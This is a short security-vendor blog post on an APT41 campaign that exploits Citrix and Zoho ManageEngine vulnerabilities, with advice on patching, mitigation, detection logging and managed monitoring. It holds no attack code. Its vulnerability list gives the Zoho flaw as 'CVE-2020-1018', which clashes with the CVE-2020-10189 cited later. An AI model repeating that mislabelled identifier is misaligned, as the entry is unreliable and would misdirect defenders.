Analysts at FireEye have identified a massive campaign run by the Chinese-backed APT41 threat group targeting multiple business sectors. This campaign leverages many vulnerabilities in products typically used by businesses in order to gain a foothold on enterprise systems. The exploits used are:
- CVE-2019-19781– Targets Citrix Application Delivery Controller and Gateway. Allows for Directory Traversal which can be used to access credential files.
- CVE-2020-1018 – Targets Zoho ManageEngine Desktop Central before 10.0.474. Allows for remote code execution.
The group moved incredibly quickly after the vulnerabilities were announced to develop and operationalize exploits against businesses targeted by these campaigns. CVE-2019-19781 was released a month before the campaigns began, and the remote code execution Proof Of Concept (POC) for CVE-2020-10189 was released three days before APT 41 began using it.
After gaining access to a system, APT41 was seen deploying either a Meterpreter downloader or a Cobalt Strike Beacon, which both communicated back to the same command and control servers.
The best method for protecting against these attacks is to prevent them from occurring by either patching affected systems or mitigating the known vulnerabilities.
For organizations that cannot patch CVE-2019-19781, Citrix provides mitigation in the form of several system configuration changes that can be performed. More info can be found here: https://support.citrix.com/article/CTX267679.
Zoho also provides manual vulnerability mitigation steps on their support page (https://www.manageengine.com/products/desktop-central/rce-vulnerability-cve-2020-10189.html), however they recommend patching systems before attempting manual vulnerability removal.
To detect APT41 activity or other attacker behaviors, Binary Defense recommends the use of PowerShell script block logging, Sysmon logging (with appropriate configuration), and Endpoint Detection and Response (EDR) tools. This will help security analysts to detect and mitigate the ongoing infection as APT41 begins profiling a network. To make use of the information gathered by additional logging and EDR tools requires security analysts who understand attacker techniques and are skilled at interpreting the information about activity on workstations and servers. Since attacks from around the world can happen at any time of day, a Security Operations Center (SOC) should be ready to respond to attacks around the clock. Binary Defense provides expert monitoring of Security Information and Event Management (SIEM) systems and Managed EDR to defend clients’ data, brand and people against attacks 24 hours a day, every day.